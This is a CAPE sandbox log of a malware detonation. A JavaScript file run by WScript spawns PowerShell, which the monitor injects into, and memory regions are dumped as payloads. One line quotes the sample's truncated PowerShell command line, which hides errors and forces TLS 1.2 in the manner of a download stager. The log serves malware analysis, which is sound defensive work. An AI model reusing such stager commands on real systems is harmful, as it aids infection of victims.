2025-12-08 08:32:09,718 [root] DEBUG: 3284: DLL loaded at 0x6CC50000: C:\Windows\system32\sfc_os (0xd000 bytes).
2025-12-08 08:32:09,734 [root] DEBUG: 1956: Python path set to 'C:\Python38'.
2025-12-08 08:32:09,734 [root] DEBUG: 1956: Dropped file limit defaulting to 100.
2025-12-08 08:32:09,734 [root] DEBUG: 1956: wscript hook set enabled
2025-12-08 08:32:09,734 [root] INFO: Disabling sleep skipping.
2025-12-08 08:32:09,734 [root] DEBUG: 1956: YaraInit: Compiled rules loaded from existing file C:\tmp76j_8pz8\data\yara\capemon.yac
2025-12-08 08:32:09,734 [root] DEBUG: 1956: YaraScan: Scanning 0x00BE0000, size 0x253d4
2025-12-08 08:32:09,734 [root] DEBUG: 3284: DLL loaded at 0x5F450000: C:\Program Files\Microsoft Office\root\Office16\OSFSHARED (0x5d000 bytes).
2025-12-08 08:32:09,734 [root] DEBUG: 1956: Monitor initialised: 32-bit capemon loaded in process 1956 at 0x6c9a0000, thread 232, image base 0xbe0000, stack from 0x306000-0x310000
2025-12-08 08:32:09,734 [root] DEBUG: 1956: Commandline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\LCSSW.js"
2025-12-08 08:32:09,734 [root] DEBUG: 1956: GetAddressByYara: ModuleBase 0x774E0000 FunctionName LdrpCallInitRoutine
2025-12-08 08:32:09,750 [root] DEBUG: 3284: DLL loaded at 0x5F400000: C:\Program Files\Microsoft Office\root\Office16\MSOHEV (0x48000 bytes).
2025-12-08 08:32:09,750 [root] DEBUG: 1956: hook_api: LdrpCallInitRoutine export address 0x77538810 obtained via GetFunctionAddress
2025-12-08 08:32:09,750 [root] DEBUG: 1956: hook_api: Warning - CreateRemoteThreadEx export address 0x764AF98F differs from GetProcAddress -> 0x754EBB18 (KERNELBASE.dll::0xbb18)
2025-12-08 08:32:09,750 [root] DEBUG: 1956: hook_api: Warning - UpdateProcThreadAttribute export address 0x764B020F differs from GetProcAddress -> 0x754F43FB (KERNELBASE.dll::0x143fb)
2025-12-08 08:32:09,750 [root] WARNING: b'Unable to place hook on GetCommandLineA'
2025-12-08 08:32:09,750 [root] DEBUG: 1956: set_hooks: Unable to hook GetCommandLineA
2025-12-08 08:32:09,765 [root] WARNING: b'Unable to place hook on GetCommandLineW'
2025-12-08 08:32:09,765 [root] DEBUG: 1236: api-rate-cap: memcpy hook disabled due to rate
2025-12-08 08:32:09,765 [root] DEBUG: 1956: set_hooks: Unable to hook GetCommandLineW
2025-12-08 08:32:09,781 [root] DEBUG: 1956: Hooked 611 out of 613 functions
2025-12-08 08:32:09,796 [root] DEBUG: 1956: WoW64 not detected.
2025-12-08 08:32:09,796 [root] INFO: Loaded monitor into process with pid 1956
2025-12-08 08:32:09,812 [root] DEBUG: 1956: caller_dispatch: Added region at 0x00BE0000 to tracked regions list (kernel32::GetSystemTimeAsFileTime returns to 0x00BE3DA7, thread 232).
2025-12-08 08:32:09,812 [root] DEBUG: 1956: YaraScan: Scanning 0x00BE0000, size 0x253d4
2025-12-08 08:32:09,828 [root] DEBUG: 1956: ProcessImageBase: Main module image at 0x00BE0000 unmodified (entropy change 0.000000e+00)
2025-12-08 08:32:09,828 [root] DEBUG: 1956: DLL loaded at 0x753E0000: C:\Windows\System32\CRYPTBASE (0xc000 bytes).
2025-12-08 08:32:09,828 [root] DEBUG: 1956: DLL loaded at 0x74170000: C:\Windows\system32\uxtheme (0x40000 bytes).
2025-12-08 08:32:09,859 [root] DEBUG: 1236: api-rate-cap: RegQueryValueExW hook disabled due to rate
2025-12-08 08:32:09,859 [root] DEBUG: 1236: api-rate-cap: SHGetKnownFolderPath hook disabled due to rate
2025-12-08 08:32:09,875 [root] DEBUG: 1236: api-rate-cap: NtQueryValueKey hook disabled due to rate
2025-12-08 08:32:09,890 [root] DEBUG: 1956: DLL loaded at 0x753F0000: C:\Windows\System32\SXS (0x5f000 bytes).
2025-12-08 08:32:09,890 [root] DEBUG: 1956: DLL loaded at 0x73E80000: C:\Windows\System32\dwmapi (0x13000 bytes).
2025-12-08 08:32:09,906 [root] DEBUG: 1956: DLL loaded at 0x76100000: C:\Windows\system32\CLBCatQ (0x83000 bytes).
2025-12-08 08:32:09,921 [root] DEBUG: 1956: DLL loaded at 0x5F350000: C:\Windows\System32\jscript (0xa6000 bytes).
2025-12-08 08:32:09,953 [root] DEBUG: 1956: DLL loaded at 0x75630000: C:\Windows\system32\WINTRUST (0x2f000 bytes).
2025-12-08 08:32:09,953 [root] DEBUG: 1956: DLL loaded at 0x74ED0000: C:\Windows\System32\CRYPTSP (0x16000 bytes).
2025-12-08 08:32:09,953 [root] DEBUG: 1956: DLL loaded at 0x74C60000: C:\Windows\system32\rsaenh (0x3b000 bytes).
2025-12-08 08:32:09,953 [root] DEBUG: 1956: DLL loaded at 0x6FC90000: C:\Windows\System32\MSISIP (0x8000 bytes).
2025-12-08 08:32:09,984 [root] DEBUG: 1956: DLL loaded at 0x5F330000: C:\Windows\system32\wshext (0x16000 bytes).
2025-12-08 08:32:09,984 [root] DEBUG: 1236: OpenProcessHandler: Injection info created for process 3284, handle 0xaa4: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
2025-12-08 08:32:09,984 [root] DEBUG: 1956: DLL loaded at 0x721D0000: C:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\COMCTL32 (0x84000 bytes).
2025-12-08 08:32:09,984 [root] DEBUG: 1236: api-rate-cap: GetSystemMetrics hook disabled due to rate
2025-12-08 08:32:09,984 [root] DEBUG: 1956: DLL loaded at 0x766D0000: C:\Windows\system32\SHELL32 (0xc4c000 bytes).
2025-12-08 08:32:10,000 [root] DEBUG: 1956: DLL loaded at 0x5F300000: C:\Windows\system32\scrobj (0x2d000 bytes).
2025-12-08 08:32:10,000 [root] DEBUG: 1956: DLL loaded at 0x75450000: C:\Windows\System32\RpcRtRemote (0xe000 bytes).
2025-12-08 08:32:10,000 [root] DEBUG: 3284: DLL loaded at 0x6F9F0000: C:\Windows\system32\WINSPOOL.DRV (0x51000 bytes).
2025-12-08 08:32:10,015 [root] DEBUG: 1236: api-rate-cap: FindNextFileW hook disabled due to rate
2025-12-08 08:32:10,046 [root] DEBUG: 1956: DLL loaded at 0x5F690000: C:\Windows\system32\comsvcs (0x136000 bytes).
2025-12-08 08:32:10,046 [root] DEBUG: 1956: DLL loaded at 0x73850000: C:\Windows\system32\ATL (0x14000 bytes).
2025-12-08 08:32:10,046 [root] DEBUG: 1956: DLL loaded at 0x5F670000: C:\Windows\System32\mtxoci (0x20000 bytes).
2025-12-08 08:32:10,078 [root] DEBUG: 1956: DLL loaded at 0x742B0000: C:\Windows\System32\PROPSYS (0xf5000 bytes).
2025-12-08 08:32:10,078 [root] DEBUG: 1956: DLL loaded at 0x743F0000: C:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32 (0x19e000 bytes).
2025-12-08 08:32:10,093 [root] DEBUG: 1956: DLL loaded at 0x75390000: C:\Windows\System32\apphelp (0x4c000 bytes).
2025-12-08 08:32:10,093 [root] DEBUG: 1956: DLL loaded at 0x6BC50000: C:\Windows\System32\ieframe (0xc42000 bytes).
2025-12-08 08:32:10,093 [root] DEBUG: 1956: DLL loaded at 0x755C0000: C:\Windows\system32\api-ms-win-downlevel-advapi32-l1-1-0 (0x5000 bytes).
2025-12-08 08:32:10,093 [root] DEBUG: 1956: DLL loaded at 0x757E0000: C:\Windows\system32\api-ms-win-downlevel-shlwapi-l1-1-0 (0x4000 bytes).
2025-12-08 08:32:10,093 [root] DEBUG: 1956: DLL loaded at 0x75610000: C:\Windows\system32\api-ms-win-downlevel-user32-l1-1-0 (0x4000 bytes).
2025-12-08 08:32:10,093 [root] DEBUG: 1956: DLL loaded at 0x6FBD0000: C:\Windows\System32\api-ms-win-downlevel-shell32-l1-1-0 (0x4000 bytes).
2025-12-08 08:32:10,093 [root] DEBUG: 1956: DLL loaded at 0x75620000: C:\Windows\system32\api-ms-win-downlevel-version-l1-1-0 (0x4000 bytes).
2025-12-08 08:32:10,109 [root] DEBUG: 1956: DLL loaded at 0x75600000: C:\Windows\system32\api-ms-win-downlevel-normaliz-l1-1-0 (0x3000 bytes).
2025-12-08 08:32:10,109 [root] DEBUG: 1956: DLL loaded at 0x77630000: C:\Windows\system32\normaliz (0x3000 bytes).
2025-12-08 08:32:10,109 [root] DEBUG: 1956: DLL loaded at 0x761B0000: C:\Windows\system32\iertutil (0x232000 bytes).
2025-12-08 08:32:10,109 [root] DEBUG: 1956: api-rate-cap: RegQueryValueExW hook disabled due to rate
2025-12-08 08:32:10,125 [root] DEBUG: 1956: DLL loaded at 0x73A90000: C:\Windows\System32\ntmarta (0x21000 bytes).
2025-12-08 08:32:10,125 [root] DEBUG: 1956: DLL loaded at 0x75810000: C:\Windows\system32\WLDAP32 (0x45000 bytes).
2025-12-08 08:32:10,125 [root] DEBUG: 1956: DLL loaded at 0x75F60000: C:\Windows\system32\SETUPAPI (0x19d000 bytes).
2025-12-08 08:32:10,125 [root] DEBUG: 1956: DLL loaded at 0x755D0000: C:\Windows\system32\CFGMGR32 (0x27000 bytes).
2025-12-08 08:32:10,125 [root] DEBUG: 1956: DLL loaded at 0x757A0000: C:\Windows\system32\DEVOBJ (0x12000 bytes).
2025-12-08 08:32:10,140 [root] DEBUG: 1956: DLL loaded at 0x754D0000: C:\Windows\system32\profapi (0xb000 bytes).
2025-12-08 08:32:10,156 [root] DEBUG: 1956: DLL loaded at 0x75E10000: C:\Windows\system32\urlmon (0x14a000 bytes).
2025-12-08 08:32:10,156 [root] DEBUG: 1956: DLL loaded at 0x75790000: C:\Windows\system32\api-ms-win-downlevel-ole32-l1-1-0 (0x4000 bytes).
2025-12-08 08:32:10,156 [root] DEBUG: 1956: DLL loaded at 0x75920000: C:\Windows\system32\WININET (0x1e4000 bytes).
2025-12-08 08:32:10,156 [root] DEBUG: 1956: DLL loaded at 0x757C0000: C:\Windows\system32\USERENV (0x17000 bytes).
2025-12-08 08:32:10,156 [root] DEBUG: 1956: DLL loaded at 0x75350000: C:\Windows\System32\Secur32 (0x8000 bytes).
2025-12-08 08:32:10,171 [root] DEBUG: 1956: CreateProcessHandler: Injection info set for new process 1876: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ImageBase: 0x00A20000
2025-12-08 08:32:10,171 [root] INFO: Announced 32-bit process name: powershell.exe pid: 1876
2025-12-08 08:32:10,171 [lib.api.process] INFO: Monitor config for <Process 1876 powershell.exe>: C:\tmp76j_8pz8\dll\1876.ini
2025-12-08 08:32:10,171 [lib.api.process] INFO: 32-bit DLL to inject is C:\tmp76j_8pz8\dll\AVhNcK.dll, loader C:\tmp76j_8pz8\bin\Hlvfqvk.exe
2025-12-08 08:32:10,171 [root] DEBUG: Loader: Injecting process 1876 (thread 2812) with C:\tmp76j_8pz8\dll\AVhNcK.dll.
2025-12-08 08:32:10,171 [root] DEBUG: InjectDllViaIAT: Successfully patched IAT.
2025-12-08 08:32:10,171 [root] DEBUG: Successfully injected DLL C:\tmp76j_8pz8\dll\AVhNcK.dll.
2025-12-08 08:32:10,187 [lib.api.process] INFO: Injected into 32-bit <Process 1876 powershell.exe>
2025-12-08 08:32:10,187 [root] INFO: Announced 32-bit process name: powershell.exe pid: 1876
2025-12-08 08:32:10,187 [lib.api.process] INFO: Monitor config for <Process 1876 powershell.exe>: C:\tmp76j_8pz8\dll\1876.ini
2025-12-08 08:32:10,187 [lib.api.process] INFO: 32-bit DLL to inject is C:\tmp76j_8pz8\dll\AVhNcK.dll, loader C:\tmp76j_8pz8\bin\Hlvfqvk.exe
2025-12-08 08:32:10,187 [root] DEBUG: Loader: Injecting process 1876 (thread 2812) with C:\tmp76j_8pz8\dll\AVhNcK.dll.
2025-12-08 08:32:10,187 [root] DEBUG: InjectDllViaIAT: This image has already been patched.
2025-12-08 08:32:10,187 [root] DEBUG: Successfully injected DLL C:\tmp76j_8pz8\dll\AVhNcK.dll.
2025-12-08 08:32:10,187 [lib.api.process] INFO: Injected into 32-bit <Process 1876 powershell.exe>
2025-12-08 08:32:10,187 [root] DEBUG: 1956: DLL loaded at 0x6CC50000: C:\Windows\system32\sfc (0x3000 bytes).
2025-12-08 08:32:10,187 [root] DEBUG: 1956: DLL loaded at 0x5F2F0000: C:\Windows\System32\sfc_os (0xd000 bytes).
2025-12-08 08:32:10,218 [root] DEBUG: 1956: NtTerminateProcess hook: Attempting to dump process 1956
2025-12-08 08:32:10,218 [root] DEBUG: 1956: DoProcessDump: Skipping process dump as code is identical on disk.
2025-12-08 08:32:10,234 [root] INFO: Process with pid 1956 has terminated
2025-12-08 08:32:10,249 [root] DEBUG: 1876: Python path set to 'C:\Python38'.
2025-12-08 08:32:10,265 [root] DEBUG: 1876: Dropped file limit defaulting to 100.
2025-12-08 08:32:10,265 [root] INFO: Disabling sleep skipping.
2025-12-08 08:32:10,265 [root] DEBUG: 1876: YaraInit: Compiled rules loaded from existing file C:\tmp76j_8pz8\data\yara\capemon.yac
2025-12-08 08:32:10,265 [root] DEBUG: 1876: YaraScan: Scanning 0x00A20000, size 0x6a0b6
2025-12-08 08:32:10,281 [root] DEBUG: 1876: Monitor initialised: 32-bit capemon loaded in process 1876 at 0x6c9a0000, thread 2812, image base 0xa20000, stack from 0x206000-0x210000
2025-12-08 08:32:10,281 [root] DEBUG: 1876: Commandline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"  $ErrorActionPreference = 'SilentlyContinue';$t56fg = [Enum]::ToObject([System.Net.SecurityProtocolType], 3072);[System.Net.ServicePointManager]::SecurityProtocol = $t56fg;$w
2025-12-08 08:32:10,281 [root] DEBUG: 1876: GetAddressByYara: ModuleBase 0x774E0000 FunctionName LdrpCallInitRoutine
2025-12-08 08:32:10,281 [root] DEBUG: 1876: hook_api: LdrpCallInitRoutine export address 0x77538810 obtained via GetFunctionAddress
2025-12-08 08:32:10,296 [root] DEBUG: 1876: hook_api: Warning - CreateRemoteThreadEx export address 0x764AF98F differs from GetProcAddress -> 0x754EBB18 (KERNELBASE.dll::0xbb18)
2025-12-08 08:32:10,296 [root] DEBUG: 1876: hook_api: Warning - UpdateProcThreadAttribute export address 0x764B020F differs from GetProcAddress -> 0x754F43FB (KERNELBASE.dll::0x143fb)
2025-12-08 08:32:10,312 [root] WARNING: b'Unable to place hook on GetCommandLineA'
2025-12-08 08:32:10,312 [root] DEBUG: 1876: set_hooks: Unable to hook GetCommandLineA
2025-12-08 08:32:10,312 [root] WARNING: b'Unable to place hook on GetCommandLineW'
2025-12-08 08:32:10,312 [root] DEBUG: 1876: set_hooks: Unable to hook GetCommandLineW
2025-12-08 08:32:10,328 [root] DEBUG: 1876: Hooked 611 out of 613 functions
2025-12-08 08:32:10,328 [root] DEBUG: 1876: WoW64 not detected.
2025-12-08 08:32:10,328 [root] INFO: Loaded monitor into process with pid 1876
2025-12-08 08:32:10,328 [root] DEBUG: 1876: caller_dispatch: Added region at 0x00A20000 to tracked regions list (kernel32::GetSystemTimeAsFileTime returns to 0x00A2D994, thread 2812).
2025-12-08 08:32:10,343 [root] DEBUG: 1876: YaraScan: Scanning 0x00A20000, size 0x6a0b6
2025-12-08 08:32:10,343 [root] DEBUG: 1876: ProcessImageBase: Main module image at 0x00A20000 unmodified (entropy change 0.000000e+00)
2025-12-08 08:32:10,343 [root] DEBUG: 1876: GetEntropy: Error - Supplied address inaccessible: 0x001D0000
2025-12-08 08:32:10,343 [root] DEBUG: 1876: AddTrackedRegion: GetEntropy failed.
2025-12-08 08:32:10,359 [root] DEBUG: 1876: caller_dispatch: Added region at 0x001D0000 to tracked regions list (kernel32::LoadLibraryExW returns to 0x0020F4B8, thread 2812).
2025-12-08 08:32:10,359 [root] DEBUG: 1876: ReverseScanForNonZero: Error - Supplied size zero.
2025-12-08 08:32:10,359 [modules.auxiliary.human] INFO: Issuing keypress on Office dialog
2025-12-08 08:32:10,359 [lib.common.results] INFO: Uploading file C:\WcVPSdVSz\CAPE\1876_69864991032881122025 to CAPE\81e92b65ac266640c690a2c6ebec339e987cdd84194bd5595cc77216aa531eea; Size is 2348; Max size: 100000000
2025-12-08 08:32:10,375 [root] DEBUG: 1876: DumpMemory: Payload successfully created: C:\WcVPSdVSz\CAPE\1876_69864991032881122025 (size 2348 bytes)
2025-12-08 08:32:10,375 [root] DEBUG: 1876: DumpRegion: Dumped region at 0x0020F000, size 4096 bytes.
2025-12-08 08:32:10,375 [root] DEBUG: 3284: DLL loaded at 0x5F260000: C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\osppcext (0x194000 bytes).
2025-12-08 08:32:10,375 [root] DEBUG: 1876: ProcessTrackedRegion: Dumped region at 0x0020F000.
2025-12-08 08:32:10,375 [root] DEBUG: 1876: ReverseScanForNonZero: Error - Supplied address inaccessible: 0x001D0FFF
2025-12-08 08:32:10,375 [root] DEBUG: 3284: DLL loaded at 0x5F230000: C:\Windows\system32\WinSCard (0x23000 bytes).
2025-12-08 08:32:10,390 [root] DEBUG: 1876: YaraScan: Nothing to scan at 0x0020F000!
2025-12-08 08:32:10,390 [root] DEBUG: 1876: caller_dispatch: Added region at 0x00540000 to tracked regions list (kernel32::FindFirstFileExW returns to 0x0057005C, thread 2812).
2025-12-08 08:32:10,390 [root] DEBUG: 1876: DumpPEsInRange: Scanning range 0x00540000 - 0x00540FFF.
2025-12-08 08:32:10,406 [root] DEBUG: 1876: ScanForDisguisedPE: No PE image located in range 0x00540000-0x00540FFF.
2025-12-08 08:32:10,421 [lib.common.results] INFO: Uploading file C:\WcVPSdVSz\CAPE\1876_96258541032881122025 to CAPE\34e3b7401cb0a9d4f4225d4c58538184b49feca9c674907e015db299eb0c4bec; Size is 4095; Max size: 100000000
2025-12-08 08:32:10,421 [root] DEBUG: 1876: DumpMemory: Payload successfully created: C:\WcVPSdVSz\CAPE\1876_96258541032881122025 (size 4095 bytes)
2025-12-08 08:32:10,453 [root] DEBUG: 1876: DumpRegion: Dumped entire allocation from 0x00540000, size 4096 bytes.
2025-12-08 08:32:10,453 [root] DEBUG: 1876: ProcessTrackedRegion: Dumped region at 0x00540000.
2025-12-08 08:32:10,453 [root] DEBUG: 1876: YaraScan: Scanning 0x00540000, size 0xfff
2025-12-08 08:32:10,453 [root] DEBUG: 1876: DLL loaded at 0x6C910000: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscoreei (0x8d000 bytes).
2025-12-08 08:32:10,468 [root] DEBUG: 1876: DLL loaded at 0x74960000: C:\Windows\system32\VERSION (0x9000 bytes).
2025-12-08 08:32:10,468 [root] DEBUG: 3284: DLL loaded at 0x5F0F0000: C:\Windows\System32\msxml3 (0x133000 bytes).
2025-12-08 08:32:10,531 [root] DEBUG: 1876: DLL loaded at 0x5E940000: C:\Windows\Microsoft.NET\Framework\v4.0.30319\clr (0x7b0000 bytes).
2025-12-08 08:32:10,546 [root] DEBUG: 1876: DLL loaded at 0x5E920000: C:\Windows\system32\VCRUNTIME140_CLR0400 (0x14000 bytes).
2025-12-08 08:32:10,546 [root] DEBUG: 1876: DLL loaded at 0x5E870000: C:\Windows\system32\ucrtbase_clr0400 (0xab000 bytes).
2025-12-08 08:32:10,562 [root] DEBUG: 1876: AllocationHandler: Adding allocation to tracked region list: 0x002E3000, size: 0x1000.
2025-12-08 08:32:10,562 [root] DEBUG: 1876: GetEntropy: Error - Supplied address inaccessible: 0x002E0000
2025-12-08 08:32:10,562 [root] DEBUG: 1876: AddTrackedRegion: GetEntropy failed.
2025-12-08 08:32:10,703 [root] DEBUG: 1876: DLL loaded at 0x5D460000: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\75b341f10c9579cbe1059d18f6f3b27b\mscorlib.ni (0x140e000 bytes).
2025-12-08 08:32:10,734 [root] DEBUG: 1876: AllocationHandler: Adding allocation to tracked region list: 0x009B0000, size: 0x1000.
2025-12-08 08:32:10,734 [root] DEBUG: 1876: AddTrackedRegion: GetEntropy failed.
2025-12-08 08:32:10,734 [root] DEBUG: 1876: AllocationHandler: Processing previous tracked region at: 0x002E0000.
2025-12-08 08:32:10,734 [root] DEBUG: 1876: DumpPEsInRange: Scanning range 0x002E0000 - 0x002E0015.
2025-12-08 08:32:10,750 [root] DEBUG: 1876: ScanForDisguisedPE: Size too small: 0x15 bytes
2025-12-08 08:32:10,750 [lib.common.results] INFO: Uploading file C:\WcVPSdVSz\CAPE\1876_220395001032081122025 to CAPE\3e699cf808d1ed5864b23ce28506c901e6f1a057b0f4c4204a90a55fe362607a; Size is 21; Max size: 100000000
2025-12-08 08:32:10,750 [root] DEBUG: 1876: DumpMemory: Payload successfully created: C:\WcVPSdVSz\CAPE\1876_220395001032081122025 (size 21 bytes)
2025-12-08 08:32:10,750 [root] DEBUG: 1876: DumpRegion: Dumped entire allocation from 0x002E0000, size 4096 bytes.
2025-12-08 08:32:10,750 [root] DEBUG: 1876: ProcessTrackedRegion: Dumped region at 0x002E0000.
2025-12-08 08:32:10,750 [root] DEBUG: 1876: YaraScan: Scanning 0x002E0000, size 0x15
2025-12-08 08:32:10,750 [root] DEBUG: 1876: DLL loaded at 0x753E0000: C:\Windows\system32\CRYPTBASE (0xc000 bytes).
2025-12-08 08:32:10,750 [root] DEBUG: 1876: AllocationHandler: Adding allocation to tracked region list: 0x04FF1000, size: 0x1000.
2025-12-08 08:32:10,765 [root] DEBUG: 1876: AllocationHandler: Processing previous tracked region at: 0x009B0000.
2025-12-08 08:32:10,765 [root] DEBUG: 1876: DumpPEsInRange: Scanning range 0x009B0000 - 0x009B00DA.
2025-12-08 08:32:10,765 [root] DEBUG: 1876: ScanForDisguisedPE: Size too small: 0xda bytes
2025-12-08 08:32:10,765 [lib.common.results] INFO: Uploading file C:\WcVPSdVSz\CAPE\1876_76859551032081122025 to CAPE\3048fddd9c92580e8bb4c519807ad3a3d28c1d40dd82c7432f1bc3f8e899387e; Size is 218; Max size: 100000000
2025-12-08 08:32:10,765 [root] DEBUG: 1876: DumpMemory: Payload successfully created: C:\WcVPSdVSz\CAPE\1876_76859551032081122025 (size 218 bytes)
2025-12-08 08:32:10,765 [root] DEBUG: 1876: DumpRegion: Dumped entire allocation from 0x009B0000, size 4096 bytes.
2025-12-08 08:32:10,765 [root] DEBUG: 1876: ProcessTrackedRegion: Dumped region at 0x009B0000.
2025-12-08 08:32:10,765 [root] DEBUG: 1876: YaraScan: Scanning 0x009B0000, size 0xda
2025-12-08 08:32:10,781 [root] DEBUG: 1876: AllocationHandler: Allocation already in tracked region list: 0x04FF0000.
2025-12-08 08:32:10,781 [root] DEBUG: 1876: AllocationHandler: Allocation already in tracked region list: 0x002E0000.
2025-12-08 08:32:10,828 [root] DEBUG: 556: OpenProcessHandler: Injection info created for process 3284, handle 0x624: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
2025-12-08 08:32:10,859 [root] DEBUG: 1876: DLL loaded at 0x5CA00000: C:\Windows\assembly\NativeImages_v4.0.30319_32\System\2bef38851483abae82f1172c1aaa604c\System.ni (0xa55000 bytes).
2025-12-08 08:32:10,953 [root] DEBUG: 1876: DLL loaded at 0x5C1E0000: C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\9d04ce1d8a3042f50b54c7f9ccdb4068\System.Core.ni (0x818000 bytes).
2025-12-08 08:32:10,953 [root] DEBUG: 1876: DLL loaded at 0x5C150000: C:\Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Pb378ec07#\e94ba0e5a14690d49a13eeb2b37f10e5\Microsoft.PowerShell.ConsoleHost.ni (0x8f000 bytes).
2025-12-08 08:32:10,953 [root] DEBUG: 1876: DLL loaded at 0x74ED0000: C:\Windows\system32\CRYPTSP (0x16000 bytes).
2025-12-08 08:32:10,953 [root] DEBUG: 1876: DLL loaded at 0x74C60000: C:\Windows\system32\rsaenh (0x3b000 bytes).
2025-12-08 08:32:10,953 [root] DEBUG: 1876: AllocationHandler: Adding allocation to tracked region list: 0x0031B000, size: 0x1000.
2025-12-08 08:32:10,953 [root] DEBUG: 1876: GetEntropy: Error - Supplied address inaccessible: 0x00310000
2025-12-08 08:32:10,968 [root] DEBUG: 1876: AddTrackedRegion: GetEntropy failed.
2025-12-08 08:32:10,968 [root] DEBUG: 1876: AllocationHandler: Processing previous tracked region at: 0x04FF0000.
2025-12-08 08:32:10,984 [root] DEBUG: 1876: DumpPEsInRange: Scanning range 0x04FF0000 - 0x04FF2FFF.
2025-12-08 08:32:10,984 [root] DEBUG: 1876: ScanForDisguisedPE: No PE image located in range 0x04FF0000-0x04FF2FFF.
2025-12-08 08:32:10,984 [lib.common.results] INFO: Uploading file C:\WcVPSdVSz\CAPE\1876_140603761032081122025 to CAPE\36ec8102101fcfac34ce1053446ab47cff1ca62f8dc0dc7ce47ded8329f05657; Size is 12287; Max size: 100000000
2025-12-08 08:32:10,984 [root] DEBUG: 1876: DumpMemory: Payload successfully created: C:\WcVPSdVSz\CAPE\1876_140603761032081122025 (size 12287 bytes)
2025-12-08 08:32:11,000 [root] DEBUG: 1876: DumpRegion: Dumped entire allocation from 0x04FF0000, size 12288 bytes.
2025-12-08 08:32:11,000 [root] DEBUG: 1876: ProcessTrackedRegion: Dumped region at 0x04FF0000.
2025-12-08 08:32:11,000 [root] DEBUG: 1876: YaraScan: Scanning 0x04FF0000, size 0x2fff
2025-12-08 08:32:11,000 [root] DEBUG: 1876: AllocationHandler: Allocation already in tracked region list: 0x00310000.
2025-12-08 08:32:11,000 [root] DEBUG: 1876: AllocationHandler: Allocation already in tracked region list: 0x00310000.
2025-12-08 08:32:11,187 [root] DEBUG: 1876: DLL loaded at 0x5A660000: C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Manaa57fc8cc#\c37b79c19b7ae5c8d3b8c4f23fbff3dc\System.Management.Automation.ni (0x1ae3000 bytes).
2025-12-08 08:32:11,265 [root] DEBUG: 1876: set_hooks_by_export_directory: Hooked 0 out of 613 functions
2025-12-08 08:32:11,265 [root] DEBUG: 1876: DLL loaded at 0x5A640000: C:\Windows\Microsoft.NET\Framework\v4.0.30319\nlssorting (0x13000 bytes).
2025-12-08 08:32:11,281 [root] DEBUG: 1876: DLL loaded at 0x77640000: C:\Windows\system32\psapi (0x5000 bytes).
2025-12-08 08:32:11,281 [root] DEBUG: 1876: DLL loaded at 0x766D0000: C:\Windows\system32\shell32 (0xc4c000 bytes).
2025-12-08 08:32:11,281 [root] DEBUG: 1876: DLL loaded at 0x75630000: C:\Windows\system32\wintrust (0x2f000 bytes).
2025-12-08 08:32:11,296 [root] DEBUG: 1876: AllocationHandler: Allocation already in tracked region list: 0x00310000.
2025-12-08 08:32:11,296 [root] DEBUG: 1876: DLL loaded at 0x6CC50000: C:\Windows\system32\MSISIP (0x8000 bytes).
2025-12-08 08:32:11,296 [root] DEBUG: 1876: DLL loaded at 0x5A620000: C:\Windows\system32\wshext (0x16000 bytes).
2025-12-08 08:32:11,296 [root] DEBUG: 1876: DLL loaded at 0x721D0000: C:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\COMCTL32 (0x84000 bytes).
2025-12-08 08:32:11,296 [root] DEBUG: 1876: DLL loaded at 0x6FC90000: C:\Windows\System32\WindowsPowerShell\v1.0\pwrshsip (0xa000 bytes).
2025-12-08 08:32:11,312 [root] DEBUG: 1876: DLL loaded at 0x754D0000: C:\Windows\system32\profapi (0xb000 bytes).
2025-12-08 08:32:11,328 [root] DEBUG: 1876: api-rate-cap: NtDelayExecution hook disabled due to rate
2025-12-08 08:32:11,328 [root] DEBUG: 1876: AllocationHandler: Allocation already in tracked region list: 0x009B0000.
2025-12-08 08:32:11,390 [root] DEBUG: 1876: DLL loaded at 0x59E00000: C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Data\dd80b6bd88741a27f7bb74ab0c89a3ba\System.Data.ni (0x81a000 bytes).
2025-12-08 08:32:11,406 [root] DEBUG: 1876: DLL loaded at 0x59AA0000: C:\Windows\Microsoft.Net\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data (0x354000 bytes).
2025-12-08 08:32:11,421 [root] DEBUG: 1876: AllocationHandler: Adding allocation to tracked region list: 0x009F0000, size: 0x1000.
2025-12-08 08:32:11,421 [modules.auxiliary.human] INFO: Issuing keypress on Office dialog
2025-12-08 08:32:11,421 [root] DEBUG: 1876: AddTrackedRegion: GetEntropy failed.
2025-12-08 08:32:11,437 [root] DEBUG: 1876: AllocationHandler: Processing previous tracked region at: 0x00310000.
2025-12-08 08:32:11,468 [root] DEBUG: 1876: DumpPEsInRange: Scanning range 0x00310000 - 0x0031018B.
2025-12-08 08:32:11,468 [root] DEBUG: 1876: ScanForDisguisedPE: Size too small: 0x18b bytes
2025-12-08 08:32:11,484 [lib.common.results] INFO: Uploading file C:\WcVPSdVSz\CAPE\1876_97896241132081122025 to CAPE\f2414e796c3206ae212719319db20bc779018644ab25c8b65c47d06cf727912b; Size is 395; Max size: 100000000
2025-12-08 08:32:11,515 [root] DEBUG: 1876: DumpMemory: Payload successfully created: C:\WcVPSdVSz\CAPE\1876_97896241132081122025 (size 395 bytes)
2025-12-08 08:32:11,515 [root] DEBUG: 1876: DumpRegion: Dumped entire allocation from 0x00310000, size 4096 bytes.
2025-12-08 08:32:11,515 [root] DEBUG: 1876: ProcessTrackedRegion: Dumped region at 0x00310000.
2025-12-08 08:32:11,515 [root] DEBUG: 1876: YaraScan: Scanning 0x00310000, size 0x18b
